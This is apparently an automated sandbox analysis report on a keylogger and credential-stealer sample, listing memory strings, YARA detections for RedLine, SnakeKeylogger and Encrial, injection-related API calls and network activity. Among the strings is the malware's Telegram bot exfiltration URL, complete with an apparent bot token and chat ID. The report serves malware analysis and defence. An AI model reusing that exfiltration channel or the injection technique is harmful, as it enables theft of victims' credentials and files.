          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49684 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
          Source: Yara matchFile source: Process Memory Space: y79a2l1FY5.exe PID: 6664, type: MEMORYSTR

          System Summary

          barindex
          Source: 7.1.dajivhqI.pif.46b268.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.1.dajivhqI.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.1.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.46b268.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.1.dajivhqI.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.438038.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.y79a2l1FY5.exe.212fcdd8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.1.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000007.00000001.881378637.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000007.00000002.3350716480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D421C
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3380 NtWriteVirtualMemory,0_2_029D3380
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3034 NtAllocateVirtualMemory,0_2_029D3034
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D9654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_029D9654
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D9738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_029D9738
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D95CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_029D95CC
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3B44 NtUnmapViewOfSection,0_2_029D3B44
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D38D4 NtReadVirtualMemory,0_2_029D38D4
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D421A
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3032 NtAllocateVirtualMemory,0_2_029D3032
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_029D9578
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029DA634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_029DA634
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C20B40_2_029C20B4
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00408C607_2_00408C60
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0040DC117_2_0040DC11
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00407C3F7_2_00407C3F
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00418CCC7_2_00418CCC
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00406CA07_2_00406CA0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004028B07_2_004028B0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0041A4BE7_2_0041A4BE
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004182447_2_00418244
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004016507_2_00401650
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00402F207_2_00402F20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004193C47_2_004193C4
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004187887_2_00418788
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00402F897_2_00402F89
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00402B907_2_00402B90
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004073A07_2_004073A0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_29DC11987_2_29DC1198
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_29DC11A87_2_29DC11A8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_29DC14487_2_29DC1448
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_29DC14387_2_29DC1438
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CB2707_2_2A1CB270
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1C42907_2_2A1C4290
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CBB607_2_2A1CBB60
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1C81297_2_2A1C8129
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1C6F707_2_2A1C6F70
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1C42827_2_2A1C4282
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CAAD87_2_2A1CAAD8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CAAE87_2_2A1CAAE8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CF1307_2_2A1CF130
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CF1217_2_2A1CF121
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CF9CF7_2_2A1CF9CF
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CF9E07_2_2A1CF9E0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1C6F637_2_2A1C6F63
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CB4907_2_2A1CB490
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CECD87_2_2A1CECD8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CECC87_2_2A1CECC8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CF57A7_2_2A1CF57A
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CF5887_2_2A1CF588
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFE5D07_2_2DAFE5D0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF59387_2_2DAF5938
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF34A07_2_2DAF34A0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF04987_2_2DAF0498
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF00407_2_2DAF0040
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF67127_2_2DAF6712
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF0AF87_2_2DAF0AF8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF8DB87_2_2DAF8DB8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFBD807_2_2DAFBD80
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFC1C87_2_2DAFC1C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFE5C07_2_2DAFE5C0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFC1D87_2_2DAFC1D8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFB9287_2_2DAFB928
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFDD207_2_2DAFDD20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFB9197_2_2DAFB919
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFDD117_2_2DAFDD11
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFE1697_2_2DAFE169
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFE1787_2_2DAFE178
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFBD707_2_2DAFBD70
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFD8B97_2_2DAFD8B9
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF04877_2_2DAF0487
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFD8C87_2_2DAFD8C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFB4C07_2_2DAFB4C0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFB4D07_2_2DAFB4D0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFAC207_2_2DAFAC20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF30387_2_2DAF3038
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF8C307_2_2DAF8C30
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFD0087_2_2DAFD008
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF00067_2_2DAF0006
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFD0187_2_2DAFD018
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFAC117_2_2DAFAC11
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFB0687_2_2DAFB068
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFD4617_2_2DAFD461
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFB0787_2_2DAFB078
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFD4707_2_2DAFD470
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF30487_2_2DAF3048
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFCBAF7_2_2DAFCBAF
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFA7B87_2_2DAFA7B8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF27897_2_2DAF2789
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF27987_2_2DAF2798
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF2BE07_2_2DAF2BE0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF2BF07_2_2DAF2BF0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFA7C87_2_2DAFA7C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFCBC07_2_2DAFCBC0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF23307_2_2DAF2330
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF9F087_2_2DAF9F08
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF9F187_2_2DAF9F18
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFA3617_2_2DAFA361
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFA3707_2_2DAFA370
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF23407_2_2DAF2340
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF9AB17_2_2DAF9AB1
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFEE807_2_2DAFEE80
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF0A9D7_2_2DAF0A9D
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF1A907_2_2DAF1A90
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF1EE87_2_2DAF1EE8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFF2C87_2_2DAFF2C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF9AC07_2_2DAF9AC0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFF2D87_2_2DAFF2D8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF1ED87_2_2DAF1ED8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFEA287_2_2DAFEA28
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFC6207_2_2DAFC620
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFC6307_2_2DAFC630
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF92007_2_2DAF9200
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFEA197_2_2DAFEA19
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF92107_2_2DAF9210
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF96687_2_2DAF9668
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF1A7F7_2_2DAF1A7F
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAFEE707_2_2DAFEE70
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DAF96587_2_2DAF9658
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB82EB87_2_2DB82EB8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB828507_2_2DB82850
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB80B307_2_2DB80B30
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB821E87_2_2DB821E8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB840407_2_2DB84040
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB81B807_2_2DB81B80
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB82EA87_2_2DB82EA8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB828407_2_2DB82840
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB80B207_2_2DB80B20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB821D87_2_2DB821D8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB840307_2_2DB84030
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB800077_2_2DB80007
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB800407_2_2DB80040
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB81B717_2_2DB81B71
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB835507_2_2DB83550
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2DB835407_2_2DB83540
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2E1A1E407_2_2E1A1E40
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2E1A9E987_2_2E1A9E98
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2E1A2DC07_2_2E1A2DC0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00408C607_1_00408C60
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_0040DC117_1_0040DC11
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00407C3F7_1_00407C3F
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00418CCC7_1_00418CCC
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00406CA07_1_00406CA0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004028B07_1_004028B0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_0041A4BE7_1_0041A4BE
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004182447_1_00418244
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004016507_1_00401650
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00402F207_1_00402F20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004193C47_1_004193C4
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004187887_1_00418788
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00402F897_1_00402F89
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00402B907_1_00402B90
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004073A07_1_004073A0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\Links\dajivhqI.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: String function: 029D3E9C appears 45 times
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: String function: 029D3E20 appears 54 times
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: String function: 029C4414 appears 246 times
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: String function: 029C421C appears 64 times
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: String function: 029C457C appears 835 times
          Source: C:\Users\user\Links\dajivhqI.pifCode function: String function: 0040D606 appears 48 times
          Source: C:\Users\user\Links\dajivhqI.pifCode function: String function: 0040E1D8 appears 88 times
          Source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.878633103.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000002.913174273.0000000020FB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.880472759.0000000000852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000002.913716413.00000000212B7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs y79a2l1FY5.exe
